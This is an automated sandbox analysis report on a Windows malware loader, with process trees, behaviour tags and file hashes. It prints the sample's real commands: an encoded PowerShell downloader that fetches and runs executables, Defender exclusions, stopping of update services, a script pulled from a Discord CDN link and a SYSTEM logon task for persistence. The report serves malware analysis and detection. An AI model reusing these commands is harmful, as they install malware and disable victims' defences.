SeSystemEnvironmentPrivilege 1464 svchost.exe Token: SeUndockPrivilege 1464 svchost.exe Token: SeManageVolumePrivilege 1464 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1464 svchost.exe Token: SeIncreaseQuotaPrivilege 1464 svchost.exe Token: SeSecurityPrivilege 1464 svchost.exe Token: SeTakeOwnershipPrivilege 1464 svchost.exe Token: SeLoadDriverPrivilege 1464 svchost.exe Token: SeSystemtimePrivilege 1464 svchost.exe Token: SeBackupPrivilege 1464 svchost.exe Token: SeRestorePrivilege 1464 svchost.exe Token: SeShutdownPrivilege 1464 svchost.exe Token: SeSystemEnvironmentPrivilege 1464 svchost.exe Token: SeUndockPrivilege 1464 svchost.exe Token: SeManageVolumePrivilege 1464 svchost.exe Token: SeAuditPrivilege 2884 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1464 svchost.exe Token: SeIncreaseQuotaPrivilege 1464 svchost.exe Token: SeSecurityPrivilege 1464 svchost.exe Token: SeTakeOwnershipPrivilege 1464 svchost.exe Token: SeLoadDriverPrivilege 1464 svchost.exe Token: SeSystemtimePrivilege 1464 svchost.exe Token: SeBackupPrivilege 1464 svchost.exe Token: SeRestorePrivilege 1464 svchost.exe Token: SeShutdownPrivilege 1464 svchost.exe Token: SeSystemEnvironmentPrivilege 1464 svchost.exe Token: SeUndockPrivilege 1464 svchost.exe Token: SeManageVolumePrivilege 1464 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1464 svchost.exe Token: SeIncreaseQuotaPrivilege 1464 svchost.exe Token: SeSecurityPrivilege 1464 svchost.exe Token: SeTakeOwnershipPrivilege 1464 svchost.exe Token: SeLoadDriverPrivilege 1464 svchost.exe Token: SeSystemtimePrivilege 1464 svchost.exe Token: SeBackupPrivilege 1464 svchost.exe Token: SeRestorePrivilege 1464 svchost.exe Token: SeShutdownPrivilege 1464 svchost.exe Token: SeSystemEnvironmentPrivilege 1464 svchost.exe Token: SeUndockPrivilege 1464 svchost.exe Token: SeManageVolumePrivilege 1464 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1464 svchost.exe Token: SeIncreaseQuotaPrivilege 1464 svchost.exe -
Suspicious use of FindShellTrayWindow 10 IoCs
Processes:
Explorer.EXEpid process 3552 Explorer.EXE 3552 Explorer.EXE 3552 Explorer.EXE 3552 Explorer.EXE 3552 Explorer.EXE 3552 Explorer.EXE 3552 Explorer.EXE 3552 Explorer.EXE 3552 Explorer.EXE 3552 Explorer.EXE -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
Explorer.EXEpid process 3552 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Loader.exepowershell.exe5nkjivka.0do2.execmd.exe5nkjivka.0do1.execmd.exe5nkjivka.0do0.exedialer.exedescription pid process target process PID 4832 wrote to memory of 4756 4832 Loader.exe powershell.exe PID 4832 wrote to memory of 4756 4832 Loader.exe powershell.exe PID 4756 wrote to memory of 4152 4756 powershell.exe 5nkjivka.0do0.exe PID 4756 wrote to memory of 4152 4756 powershell.exe 5nkjivka.0do0.exe PID 4756 wrote to memory of 4844 4756 powershell.exe 5nkjivka.0do1.exe PID 4756 wrote to memory of 4844 4756 powershell.exe 5nkjivka.0do1.exe PID 4756 wrote to memory of 4844 4756 powershell.exe 5nkjivka.0do1.exe PID 4756 wrote to memory of 2836 4756 powershell.exe 5nkjivka.0do2.exe PID 4756 wrote to memory of 2836 4756 powershell.exe 5nkjivka.0do2.exe PID 4756 wrote to memory of 2836 4756 powershell.exe 5nkjivka.0do2.exe PID 2836 wrote to memory of 456 2836 5nkjivka.0do2.exe cmd.exe PID 2836 wrote to memory of 456 2836 5nkjivka.0do2.exe cmd.exe PID 456 wrote to memory of 1884 456 cmd.exe where.exe PID 456 wrote to memory of 1884 456 cmd.exe where.exe PID 456 wrote to memory of 4532 456 cmd.exe powershell.exe PID 456 wrote to memory of 4532 456 cmd.exe powershell.exe PID 4844 wrote to memory of 3752 4844 5nkjivka.0do1.exe openwith.exe PID 4844 wrote to memory of 3752 4844 5nkjivka.0do1.exe openwith.exe PID 4844 wrote to memory of 3752 4844 5nkjivka.0do1.exe openwith.exe PID 4844 wrote to memory of 3752 4844 5nkjivka.0do1.exe openwith.exe PID 4844 wrote to memory of 3752 4844 5nkjivka.0do1.exe openwith.exe PID 2364 wrote to memory of 712 2364 cmd.exe wusa.exe PID 2364 wrote to memory of 712 2364 cmd.exe wusa.exe PID 4152 wrote to memory of 1920 4152 5nkjivka.0do0.exe dialer.exe PID 4152 wrote to memory of 1920 4152 5nkjivka.0do0.exe dialer.exe PID 4152 wrote to memory of 1920 4152 5nkjivka.0do0.exe dialer.exe PID 4152 wrote to memory of 1920 4152 5nkjivka.0do0.exe dialer.exe PID 4152 wrote to memory of 1920 4152 5nkjivka.0do0.exe dialer.exe PID 4152 wrote to memory of 1920 4152 5nkjivka.0do0.exe dialer.exe PID 4152 wrote to memory of 1920 4152 5nkjivka.0do0.exe dialer.exe PID 1920 wrote to memory of 616 1920 dialer.exe winlogon.exe PID 1920 wrote to memory of 672 1920 dialer.exe lsass.exe PID 1920 wrote to memory of 952 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 380 1920 dialer.exe dwm.exe PID 1920 wrote to memory of 684 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1032 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1116 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1144 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1152 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1188 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1276 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1320 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1384 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1392 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1416 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1556 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1564 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1656 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1696 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1728 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1804 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1812 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 2000 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 2016 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1028 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1464 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 1844 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 2176 1920 dialer.exe spoolsv.exe PID 1920 wrote to memory of 2216 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 2380 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 2572 1920 dialer.exe sihost.exe PID 1920 wrote to memory of 2604 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 2688 1920 dialer.exe svchost.exe PID 1920 wrote to memory of 2696 1920 dialer.exe taskhostw.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
- Modifies registry class
-
C:\Windows\SysWOW64\openwith.exe"C:\Windows\system32\openwith.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\5nkjivka.0do0.exe"C:\Users\Admin\AppData\Roaming\5nkjivka.0do0.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart6⤵
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 05⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "AAWUFTXN"5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "AAWUFTXN" binpath= "C:\ProgramData\acspebqjhjkn\gjouiuwovvdx.exe" start= "auto"5⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Roaming\5nkjivka.0do1.exe"C:\Users\Admin\AppData\Roaming\5nkjivka.0do1.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\5nkjivka.0do2.exe"C:\Users\Admin\AppData\Roaming\5nkjivka.0do2.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\4A28.tmp\4A29.tmp\4A2A.bat C:\Users\Admin\AppData\Roaming\5nkjivka.0do2.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\where.exewhere node6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\msiexec.exemsiexec /i nodejs-installer.msi /quiet6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\system32\schtasks.exeschtasks /Create /SC ONLOGON /TN "RunNodeScriptAtLogon" /TR "node.exe 'C:\Users\Admin\AppData\Local\Temp\chrome2\index.js'" /RU SYSTEM /F6⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
-
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding1⤵
- Drops file in Windows directory
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 45299788C722A5A4C12B9879C436DF5D2⤵
- Loads dropped DLL
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 8DCA2F14FD1BF617E6229B16489F6CCA E Global\MSI00002⤵
- Loads dropped DLL
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 87997014CE6D92EE6D42026D040955982⤵
- Loads dropped DLL
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Config.Msi\e57d1ba.rbsFilesize
823KB
MD5f7fa1808c41dbf234a1b2488f8f5b03f
SHA1edb040d0e0da2349c6897ecf021a54158f566fa2
SHA256de439c8e743fbb67f0e6d4228dbca9474b32a0b6a7bd362a566d65c0bfabbc3c
SHA512acd53be4c6bfdb7477c1a8391852a1f3622c2cf3aa721b82e545f5451b00a328b946d601a192748b38f99348ad2c0144e6bdf761fcd5e2dffb166b57cb73efdf
-
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\tuf\LICENSEFilesize
11KB
MD5dfc1b916d4555a69859202f8bd8ad40c
SHA1fc22b6ee39814d22e77fe6386c883a58ecac6465
SHA2567b0ce3425a26fdba501cb13508af096ade77e4036dd2bd8849031ddecf64f7c9
SHA5121fbe6bb1f60c8932e4dcb927fc8c8131b9c73afd824ecbabc2045e7af07b35a4155a0f8ad3103bf25f192b6d59282bfc927aead3cb7aaeb954e1b6dbd68369fa
-
C:\Program Files\nodejs\node_modules\npm\node_modules\@sigstore\verify\dist\shared.types.jsFilesize
79B
MD524563705cc4bb54fccd88e52bc96c711
SHA1871fa42907b821246de04785a532297500372fc7
SHA256ef1f170ad28f2d870a474d2f96ae353d770fff5f20e642cd8f9b6f1d7742df13
SHA5122ce8d2cf580623358fef5f4f8925d0c9943a657c2503c80048ca789bf16eacdb980bfc8aaaa50101a738e939926fcf2545500484dcad782c700ee206d8c6f9b9
-
C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\LICENSEFilesize
754B
MD5d2cf52aa43e18fdc87562d4c1303f46a
SHA158fb4a65fffb438630351e7cafd322579817e5e1
SHA25645e433413760dc3ae8169be5ed9c2c77adc31ad4d1bc5a28939576df240f29a0
SHA51254e33d7998b5e9ba76b2c852b4d0493ebb1b1ee3db777c97e6606655325ff66124a0c0857ca4d62de96350dbaee8d20604ec22b0edc17b472086da4babbbcb16
-
C:\Program Files\nodejs\node_modules\npm\node_modules\chalk\licenseFilesize
1KB
MD5b862aeb7e1d01452e0f07403591e5a55
SHA1b8765be74fea9525d978661759be8c11bab5e60e
SHA256fcf1a18be2e25ba82acf2c59821b030d8ee764e4e201db6ef3c51900d385515f
SHA512885369fe9b8cb0af1107ee92b52c6a353da7cf75bc86abb622e2b637c81e9c5ffe36b0ac74e11cfb66a7a126b606fe7a27e91f3f4338954c847ed2280af76a5f
-
C:\Program Files\nodejs\node_modules\npm\node_modules\env-paths\licenseFilesize
1KB
MD55ad87d95c13094fa67f25442ff521efd
SHA101f1438a98e1b796e05a74131e6bb9d66c9e8542
SHA25667292c32894c8ac99db06ffa1cb8e9a5171ef988120723ebe673bf76712260ec
SHA5127187720ccd335a10c9698f8493d6caa2d404e7b21731009de5f0da51ad5b9604645fbf4bc640aa94513b9eb372aa6a31df2467198989234bc2afbce87f76fbc3
-
C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\LICENSE.mdFilesize
818B
MD52916d8b51a5cc0a350d64389bc07aef6
SHA1c9d5ac416c1dd7945651bee712dbed4d158d09e1
SHA256733dcbf5b1c95dc765b76db969b998ce0cbb26f01be2e55e7bccd6c7af29cb04
SHA512508c5d1842968c478e6b42b94e04e0b53a342dfaf52d55882fdcfe02c98186e9701983ab5e9726259fba8336282e20126c70d04fc57964027586a40e96c56b74
-
C:\Program Files\nodejs\node_modules\npm\node_modules\ignore-walk\LICENSEFilesize
780B
MD5b020de8f88eacc104c21d6e6cacc636d
SHA120b35e641e3a5ea25f012e13d69fab37e3d68d6b
SHA2563f24d692d165989cd9a00fe35ca15a2bc6859e3361fa42aa20babd435f2e4706
SHA5124220617e29dd755ad592295bc074d6bc14d44a1feeed5101129669f3ecf0e34eaa4c7c96bbc83da7352631fa262baab45d4a370dad7dabec52b66f1720c28e38
-
C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmsearch\LICENSEFilesize
730B
MD5072ac9ab0c4667f8f876becedfe10ee0
SHA10227492dcdc7fb8de1d14f9d3421c333230cf8fe
SHA2562ef361317adeda98117f14c5110182c28eae233af1f7050c83d4396961d14013
SHA512f38fd6506bd9795bb27d31f1ce38b08c9e6f1689c34fca90e9e1d5194fa064d1f34a9c51d15941506ebbbcd6d4193055e9664892521b7e39ebcd61c3b6f25013
-
C:\Program Files\nodejs\node_modules\npm\node_modules\minizlib\node_modules\minipass\LICENSEFilesize
802B
MD5d7c8fab641cd22d2cd30d2999cc77040
SHA1d293601583b1454ad5415260e4378217d569538e
